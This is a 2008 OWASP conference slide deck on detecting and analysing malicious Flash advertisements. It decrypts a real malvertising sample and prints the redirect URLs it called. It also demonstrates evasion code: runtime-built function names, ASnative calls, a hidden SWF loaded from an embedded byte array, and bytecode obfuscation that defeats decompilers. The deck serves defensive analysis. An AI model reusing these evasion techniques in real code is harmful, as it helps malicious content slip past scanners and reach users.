Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

OWASP Asia Pacific Conference 2008

The Detection and Analysis of Flash Based Malware

Paul TheriaultSenior Associate - SIFTpaul.theriault@sift.com.au

Feb 2008

OWASP

About me

Paul Theriault Security consultant with SIFT

(www.sift.com.au) Web app penetration tester Code review and developer training Security researcher

OWASP

Background

Flash is a commonly used format for rich media on the internet

Flash “Movies” aren’t really movies Application byte-code to be executed by the flash player

runtime environment Many websites accept third-party flash content

Advertising Networks Gaming Websites (Kongregate, Newgrounds…) Graphic Design/Art sites (Flash Kit, Deviantart…) Others: any forum with SWF avatars etc.

3rd Party Flash movies may contain malicious code

How can you tell?

OWASP

Talk Outline

1. Flash based malware Background Introduction to malware case study

2. Analysis Methods Disassembly Decompiling Runtime Analysis

3. Counter Analysis Methods Obfuscation & Stack Manipulation Dynamically Loading Content

OWASP

Flash Advertising

Flash has become a common format for web advertisements

Advertising organisation must accept third-party content which may be malicious

Attacker only needs to achieve redirection of user to malicious site – and Ads are supposed to redirect users!

Ads are also often allowed to contact third-party servers for tracking purposes

OWASP

Rise in “Malvertising”

Malvertising: spreading malware by convincing sites to host malicious advertisementshttp://isc.sans.org/diary.html?storyid=3727

Major advertising organisations affected Typical method is to force victim to

malicious website Old problem, new(ish) vector:

http://msmvps.com/spywaresuckswww.mikeonads.com

OWASP

“SkyAuction/BlessedAds/Errorsafe” Malware

Seen since March 2007 across many organisations

Gained widespread media attention in November with major internet properties affected

Fictitious flash advertisement which redirects visitor to malicious website without user interaction

Note:Flash file doesn’t exploit any vulnerabilityUsed encryption and obfuscated programming

techniques to hide function calls and urls

OWASP

Analysis Methods

OWASP

Analysis of Flash Content

Flash Overview Static Analysis

Bytecode level analysisActionscript AnalysisFocus on ActionScript portions of SWF file

Runtime Analysis

OWASP

SWF Introductionfunction TestLoader() {loader=new Loader();configureListeners(loader.contentLoaderInfo);//loader.load(new URLRequest('badware.swf'));

var ba:ByteArray=new ByteArray();//the binary on this line badware.swf encoded var badware:Array= [67,87,83,7,195,3,0,0,120,218,124for(var i:int=0;i<badware.length;i++){ba.writeByte(badware[i]);}

loader.loadBytes(ba);

46575307c3030000780003e800000bb800001801004302ffffffff09060000000050010000003f0e17000000010000505f5f5061636b616765732e6261647761726500ff0e2b030000005088ff00180062616477617265005f676c6f62616c0070726f746f74797065006d61696e006a6176617363726970743a616c657274282755722062617365732c204c6574206d65206d652070776e207468656d27293b005f7365

1557 label 1558 debugline 1560 getlocal1 1561 getlocal2 1562 getlocal3 1563 getproperty 1565 callpropvoid 1568 debugline 1570 inclocal_i L1: 1572 getlocal3 1573 getlocal2 1574 getproperty 1576 iflt

SWFActionScript Flash Player

OWASP

SWF Format

SWF Format Contains images, sounds, video clips AND ActionScript

bytecode (ABC) in series of tagged data blocks:File

Attributes Tag Tag Tag End Tag

Header…

2 Types of Tags: Definition & Control Definition: defines content – shapes, texts, sounds, script etc. and assign

them a character ID. Control: Manipulate instances of content (instances of characters) and

control flow of the file Complete specification for SWF format available from:

http://www.adobe.com/licensing/developer/ (requires registration)

OWASP

ActionScript Overview

Focus on the Tags that contain ActionScriptAS3: DoABCAS2: DoAction, DoInitAction, DefineButton2

ActionScript Byte CodeSequence of actions on the virtual machine

stateSpecification for AVM2 bytecode here:

http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf

OWASP

ActionScript OverviewFlash Player

ActionScript Virtual Machine

Method InformationMethod usage instructions (e.g. handling of default args)

Local Data Area - Operand Stack - Scope Stack - Local Registers

Runtime EnvironmentChain of Named Objects

Constant Pool - Numbers - Strings - Various Names

HeapObjects created at runtime

ByteCode

Output

OWASP

Tools for static analysis

Hex Editor Flasm

ActionScript bytecode assembler/disassembler SWFMILL

Converts swf to xml and vice versa ActionScript Decompiler

Flare (AS2)AVMPlus (AS3) – compiled from Tamarin

https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Using_Tamarin

OWASP

SWF DeconstructedActionScriptvar url = 'http://www.sift.com.au';getURL(url, '_self');

FLASMframe 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2end // of frame 0

SWF46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

<strings> <String value="url" /> <String value="http://www.sift.com.au" /> <String value="_self" /> </strings> ... <PushData><items><StackDictionaryLookup index="0" /></items> </PushData> <GetVariable /> <PushData><items><StackDictionaryLookup index="2" /> </items> </PushData> <GetURL2 method="0"/>

XML

OWASP

SWF Deconstructed

ActionScript

var url = 'http://www.sift.com.au';getURL(url, '_self');

OWASP

SWF Deconstructed

FLASMframe 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2end // of frame 0

{“http://www.sift.com.au”, “url”} {}

{“http://www.sift.com.au”}{_self,http://www.sift.com.au}

{“url”}

OWASP

SWF Deconstructed

XML<strings> <String value="url" /> <String value="http://www.sift.com.au" /> <String value="_self" /> </strings> ... <PushData><items><StackDictionaryLookup index="0" /></items> </PushData> <GetVariable /> <PushData><items><StackDictionaryLookup index="2" /> </items> </PushData> <GetURL2 method="0"/>

OWASP

SWF Deconstructed

SWF46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

OWASP

SWF DeconstructedActionScriptvar url = 'http://www.sift.com.au';getURL(url, '_self');

FLASMframe 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2end // of frame 0

SWF46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

<strings> <String value="url" /> <String value="http://www.sift.com.au" /> <String value="_self" /> </strings> ... <PushData><items><StackDictionaryLookup index="0" /></items> </PushData> <GetVariable /> <PushData><items><StackDictionaryLookup index="2" /> </items> </PushData> <GetURL2 method="0"/>

XML

OWASP

Byte code analysis

SWF are usually compressed Look at first 3 bytes

CWS= compressed FWS= non-compressed

Use ‘flasm –x movie.swf’ to decompress

Open SWF in Hex editor Some unusual strings Difficult to read in this format

OWASP

SWFmill

Available from http://swfmill.org Converts SWF into xml (and xml to

SWF) Much easier to read than HEX But very large files 50k malware 6000 line xml

Includes graphic data Less information than decompiling, but

more resilient to obfuscation

OWASP

SWFmill

Constants pool from malware<String value="getTime"/><String value="loadVariables"/><String value="i"/><String value="setInterval"/><String value="stats"/><String value="clearInterval"/><String value="LoadVars"/><String value="so"/> Difficult to determine where its used in this

view

OWASP

FLASM

FLASM is a ABC disassembler Available from

http://www.nowrap.de/flasm.html Describe the actionscript present in the

SWF file in terms of Virtual Machine actions: push, pop, add, callmethod, jump etc.

FLASM provides lower level analysis, helps with understanding exactly what is going on inside AVM

OWASP

FLASM analysis

Looking at the “Constants Pool” in the malware:

constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F', 'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269', 'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3', 'c14', 'c15', '0DB1', 'c16', 'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2', 'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F', 'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91', 'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833', 'c29', '47ED0203708EE9B0F06B666C9C2317CAA0', 'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice', 'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc', 'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval', 'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe', 'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view'

Looks a bit fishy…

OWASP

FLASM analysis

Can also see where its called:push 3, 0.0, 'LoadVars'

new push 14688422, 1, r:1, 'c28' getMember push 'color' callMethod

callMethod Calling a function called ‘color’ prior to

calling LoadVars

OWASP

ActionScript Analysis

FLARE (http://www.nowrap.de/flare.html) Decompiles SWF (AS2 only) files to

ActionScript Manually trace ActionScript for malicious

behaviourFunctions which connect remotelyLook for strange behaviours

Provides much better view of what is going on

OWASP

ActionScript Analysis

Examine where the strange strings are assigned:_root.c1 = '47ED02';_root.c2 = '46E91A247C';_root.c3 = '7FF817257C8DF8';_root.c4 = '50E70523';_root.c5 = '7FD7153B7080E795EA776F';_root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5…

Now searching for where they are used:(new LoadVars())[v1.c28.color(14688422)]

(v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422));

So we know it is opening a location, but where?

OWASP

ActionScript Analysis

The String.Color() function is actually a decryption method:

String.prototype.color = function (eslogan) { var v3 = eslogan; var result = ''; var v1; var n; var v2; v1 = 0; n = this.length; while (v1 < n) { v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255; if (v2 > 127) { v2 += 848;} result += String.fromCharCode(v2); v3 = (v3 * 52845 + 22719) % 16777215; v1 += 2; } return result; };

Decryption Key

OWASP

ActionScript Analysis

Compile and run decryption algorithm across the mystery variables:c1:get c11:0 c22:__tzc2:false c12:7 c23:_urlc3:_parent c13:http:// c24:substrc4:post c14:0 c25:__ftzc5:__click_url c15:-9 c26:__flvc6:http://blessedads.com/?cmpid=master0n

c16:0 c27:__fchk

c7:1 c17:http://mysurvey4u.com/stats.php?campaign=master0n

c28:send

c8:0 c18:40 c29:getTimezoneOffsetc9:0 c19:master0nintl811200

7c10:1 c20:/

OWASP

ActionScript Analysis

Substituting these decrypted strings back into the original file reveals calls:

v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=master0n", "get");

new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", “_parent”,”post”);

OWASP

Interesting Classes and Functions (AS2)

Global Functions asfunction, ASnative, chr, escape, eval, fscommand, getTimer,

getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape

Global Properties _global, _level, _root

Classes System.capabilities, ExternalInterface, LoadVars, LocalConnection,

MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket

Functions XML.load, StyleSheet.load, LoadVars.load, LoadVars.send,

LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download

OWASP

Interesting Classes and Functions (AS3)

Classes flash.display.Loader, flash.external.ExternalInterface,

flash.media.Sound, flash.media.flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer

Functions flash.net.navigateToURL, flash.net.sendToURL,

flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte

OWASP

Runtime Analysis

Load the file, use proxy to observe (and limit!) network interactions

Obviously better to do this on isolated test machine

This malware tries to evade dynamic analysisOnly connects to malicious website when Movie is

loaded via http, AND Local time is a specific value:_root["__tz"] = -(new Date())["getTimeZoneOffset"]() / 60;

if (_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://") && !(_root["__tz"] >= -9 && _root["__tz"] <= 0))) {

OWASP

Advanced Runtime Analysis via debugger

Many debug tools are available for flash: fdb (http://labs.adobe.com/technologies/flex/sdk/) Ofd-net (ALPHA - http://sourceforge.net/projects/ofd-net)

Requires Debug Flash player http://www.adobe.com/support/flashplayer/downloads.html

For 3rd party SWF, where do you get debug file (SWD)? “swf2swd.exe” from Nikos Kastellanos (ofd-net author, above

url) Also need to enable debugging:

UnlockSWF (http://www.buraks.com/unlockswf/) However, swf2swd has problems with malformed flash files…

work required to develop a robust SWD extractor

OWASP

Runtime Analysis

Issues with Runtime AnalysisDifficult to automateHave to execute potential dangerous codeRelies on observing external interactions (until

debugging tools are more mature) Other Runtime Analysis tools

SWFIntruder https://www.owasp.org/index.php/Category:SWFIntruder

Erlswf http://pentaphase.de/index.php?/archives/29-Erlang-

unscrables-SWF.html

OWASP

Counter Analysis Methods

OWASP

Counter-Analysis

Create Class and function names at runtime

Embedding code at runtime Code Obfuscation

OWASP

Class names at runtime

Basic static analysis relies on locating key function and class names

Classes can be instanced from strings using:AS2: var myClass = _global['LoadVars'];AS3: var ClassReference:Class =

getDefinitionByName("flash.display.Loader") as Class;

For example:var f=String.fromCharCodevar a=f(76); a+=f(111); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); a+=f(115); (new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');

OWASP

Function Names At Runtime

Works for function names too: var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) +

chr(76))))); _root[v3]('http://www.sift.com.au', '_parent', 'post');

String ‘GetURL’ no longer in the file

OWASP

ASnative

ASnative is an undocumented function Call AS2 functions using reference numbers,

as if all functions exist in a spreadsheet Can be used instead of the real function

namesvar escapeFunction=_global["ASnative"](100, 0);

Examples:ASnative(253, 7) - [_global] XML ASnative(301, 0) - [XML.prototype] load ASnative(100, 0) - [_global] escape

http://osflash.org/flashcoders/undocumented/asnative

OWASP

Embedding Code

Another method of hiding code is to load the malicious code at runtime

However loading code from external site is obvious to runtime analysis

Alternative is to embed data within the file and load at runtime

One way to achieve this is to use the Display.Loader.LoadBytes() method

OWASP

Embedding codeloader=new Loader();configureListeners(loader.contentLoaderInfo);

//create an byteArray containing our malicious swfvar ba:ByteArray=new ByteArray();var badware:Array=

[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29];

for(var i:int=0;i<badware.length;i++){

ba.writeByte(badware[i]);}

//load the swfloader.loadBytes(ba);

OWASP

Embedding code

Only remaining evidence isUse of loader class Pushing a massive array on the stack

Hiding the use of the Loader classUse dynamic class creation as discussed

previously Hiding the data

Encrypt/Encode valuesEmbed the values in an image (could also use

steganography techniques)

OWASP

Obfuscation

Many techniques available from efforts to secure flash movie source codeActionScript obfuscationBytecode obfuscation

ActionScript ObfuscationUse confusing variable names – numbers and

non-displayable characters

OWASP

Bytecode obfuscation

Flash AVM executes bytecodes one by one, whereas decompiler breaks the bytecode into meaningful pieces

We can exploit this to confuse decompilers

The malicious script we want to hide:var foo="getURL";_root[foo]('http://www.sift.com.au', '_parent', 'post');

OWASP

Bytecode obfuscation

Converted to action records this becomesconstants 'foo', 'getURL', 'post', '_parent',

'http://www.sift.com.au', '_root' push 'foo', 'getURL'varEqualspush 'post', '_parent', 'http://www.sift.com.au', 3, '_root'getVariablepush 'foo'getVariablecallMethodpop

OWASP

Bytecode obfuscation Using a malformed push record, we hide the data from

decompilers : push ‘junk’

label1: constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'

push 'foo', 'getURL' varEquals push 'post', '_parent', 'http://www.sift.com.au', 3, '_root' getVariable push 'foo' getVariable callMethod pop

branch label2 branch label1

label2:

Manually change the size of this “push”

OWASP

Bytecode Obfuscation

SWF (Unaffected)46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 …

(Error, but Successful) XML<PushData> <items/></PushData>

FLASM frame 0 push ??? // unknown push type 23: rest of push skipped label1: // Wild label in the middle of an action, now placed before next action branch label1 pop end // of frame 0

ActionScript

OWASP

Bytecode Obfuscation

This obfuscation technique is documented: http://www.gotoandplay.it/_articles/2004/04/swfProtection.php

Not a new technique, but example has been seen in the wild.

The malware author read this article!The Blessads malware contains strings used in

one of the examples on this page Some tools will detect these obfuscations

(e.g. Manitu ASV)

OWASP

Obfuscation seen in the wild

Flare Decompile of diepress.com malware http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx

// unknown tag 255 length 1// unknown tag 777 length 3movieClip 4680 { #initclip function () { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { for (;;) { return (164 % 511) * 5; var = -785 + (); for (;;) { for (;;) {

OWASP

Goal of Analysis

Analysis to achieve detection Reduce the risk that malicious content is

served by your organisationLarge reputational impact if malware is even

associated with your organisation Limitations:

Ad click through targets are controlled by third parties. Cannot prevent attacker modifying the target site to be malicious.

Same issue if third party interactions are allowed in the background

OWASP

Addressing the risk

Contractual Controls“Terms of use” approachComplicated chain of supply - federated ads

Reactive ControlsMechanism for users to report malicious adsEffective incident response program

Technical ControlsNeed to determine exact program functionalitySignal detection problem – malicious ads can

be very similar to legitimate ads

OWASP

What about volume?

Even basic obfuscation results in very time consuming manual analysis

Advertising organisations are dealing with thousands of campaigns, each with their own creatives

Questions to ask:Why would an legitimate add use obfuscation?Why would a legitimate add call certain function

calls or class names? Can use automated approach to find

suspicious files to be marked for further analysis.

OWASP

Recommendations

Develop combination of automated and manual analysis procedures to increase detection of malicious advertisements

Use ad templates to restrict available functionality and make analysis easier

Require 3rd party to provide source code Implement good incident detection and

response processes

OWASP

Questions?

?

OWASP

SIFT Pty Ltd – Australia

The detection and analysis of Flash based malware

Paul Theriault [paul.theriault@sift.com.au]